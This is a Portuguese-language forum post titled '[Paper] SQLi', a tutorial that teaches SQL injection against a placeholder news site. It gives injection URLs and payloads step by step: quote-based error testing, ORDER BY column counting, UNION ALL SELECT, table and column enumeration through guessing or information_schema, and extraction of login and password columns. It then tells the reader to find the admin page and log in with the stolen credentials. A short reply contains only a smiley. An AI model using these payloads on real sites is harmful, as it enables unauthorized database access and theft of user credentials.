Autor Tópico: [Paper] SQLi  (Lida 421 vezes)

0 Membros e 1 Visitante estão vendo este tópico.

Twi John

  • Newbie
  • *
  • Posts: 4
  • Reputa +1/-0
    • Ver perfil
[Paper] SQLi
« Online: 03 de Abril , 2010, 01:44:10 pm »
Código: [Selecionar]
   _____  ____  _        _____       _           _   _
  / ____|/ __ \| |      |_   _|     (_)         | | (_)
 | (___ | |  | | |        | |  _ __  _  ___  ___| |_ _  ___  _ __
  \___ \| |  | | |        | | | '_ \| |/ _ \/ __| __| |/ _ \| '_ \
  ____) | |__| | |____   _| |_| | | | |  __/ (__| |_| | (_) | | | |
 |_____/ \___\_\______| |_____|_| |_| |\___|\___|\__|_|\___/|_| |_|
                                   _/ |
                                  |__/

# Por Twi John
----------------

Primeiramente quero mostrar para vocês um site onde vocês poderam encontrar mais sobre novas vulnerabilidades, como se proteger de vulnerabilidades da web.

http://www.owasp.org/

Nessa aula estremos aprendendo SQLi, no entanto dessa vez estaremos consultado o database Mysql para obter informações de login e senha.

Aqui esta o site: www.site.com.br/noticias.php?id=10

Para descobrir se pode estar vulneravel, coloque ' depois do link, caso dei algum erro tem grande chance de estar vulneravel.

    www.site.com.br/noticias.php?id=10'



Um exemplo de erro: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/public_html/noticias/index.php on line 282

Essa falha é baseada em erros.

Vamos pegar o numero de colunas usando ORDER BY *
É usado dessa maneira:

    +order+by+1 //Sem erro
    +order+by+2 //Sem erro
    +order+by+3 //Sem erro
    +order+by+4 //Sem erro
    +order+by+5 //Sem erro
    +order+by+6 //Erro



    www.site.com.br/noticias.php?id=10+order+by+5



Então são apenas 5 colunas

Vamos uni-las, usando UNION ALL SELECT *



    http://www.site.com.br/noticias.php?id=10+union+all+select+1,2,3,4,5



Coloque um traço (-) antes do valor da variavel ficando assim:

    http://www.site.com.br/noticias.php?id=-10+union+all+select+1,2,3,4,5



Irão aparecer numeros, eles que nóis iremos subtituir por informações:

Precisamos encontrar a tabela do login agora, podemos usar Brute Force, ou então information_schema. O information_schema só funciona em databases MYSQL acima de versão acima de 5.0, para descobrir a versão use: version()


    +union+all+select+1,version(),3



//--Brute Force--\\

Vamos tentar colocar tabelas até que não apareça erro:

    UNION ALL SELECT * FROM ADMIN == erro
    "" "" "" "" LOGIN == erro
    "" "" "" "" USER == erro
    "" "" "" "" USERS == erro
    "" "" "" "" USUARIOS == sem erro


Então no caso ficaria assim:

    http://www.site.com.br/noticias.php?id=-10+union+all+select+1,2,3,4,5+from+usuarios



Você pode usar: admin, admins, usuarios, usuario, user, users, user_name, username, login, adm, tb_usuarios, tb_admin ... entre outros.

//--INFORMATION_SCHEMA--\\

DATABASE: INFORMATION_SCHEMA
TABELA: TABLES
COLUNA: TABLE_NAME

Sintaxe = Exemplo: UNION ALL SELECT 1,TABLE_NAME,3 FROM INFORMATION_SCHEMA.TABLES

Para ir passando de tabela você usa LIMIT *

    LIMIT 1,1
    LIMIT 2,1
    LIMIT 3,1
    LIMIT 4,1
    LIMIT 5,1


... E assim vai indo até encontrar uma tabela de login.

Ex:

    http://www.site.com.br/noticias.php?id=-10+union+all+select+1,2,table_name,4,5+from+information_schema.tables+limit+1,1



//

Vamos agora descobrir as colunas de login, você pode usar as mesmas tecnicas de brute force e information_schema, no entanto information_schema é um pouco diferente:

DATABASE: INFORMATION_SCHEMA
TABELLA: COLUMNS
COLUNA: COLUMN_NAME

Sintaxe = Exemplo: UNION ALL SELECT 1,COLUMN_NAME,3 FROM INFORMATION_SCHEMA.COLUMNS

Para passar de coluna pode usar o LIMIT também.

//

Agora continuando suponhamos que eu tenha pegado a tabela USUARIOS e as colunas LOGIN e SENHA, para pegar as informações de login e senha é so digitar eles no seu site, nos numeros visiveis, suponhamos que tenha parecido o 2 e 3 então vamos substituir eles pela informação:


    UNION ALL SELECT 1,LOGIN,SENHA,3,4,5 FROM USUARIOS



    http://www.site.com.br/noticias.php?id=-10+union+all+select+1,login,senha,4,5+from+usuarios



Agora é só encontrar a area de login, geralmente fica em /admin , /adm/ , /administrator /login.php , ou você pode usar o acunetix ou algum outro tool para encontrar a area de login.
Ao encontra-la é só você se logar com as informações que você pegou


carloshacking

  • Newbie
  • *
  • Posts: 1
  • Reputa +0/-0
    • Ver perfil
Re:[Paper] SQLi
« Resposta #1 Online: 09 de Setembro , 2014, 05:05:31 pm »
 :)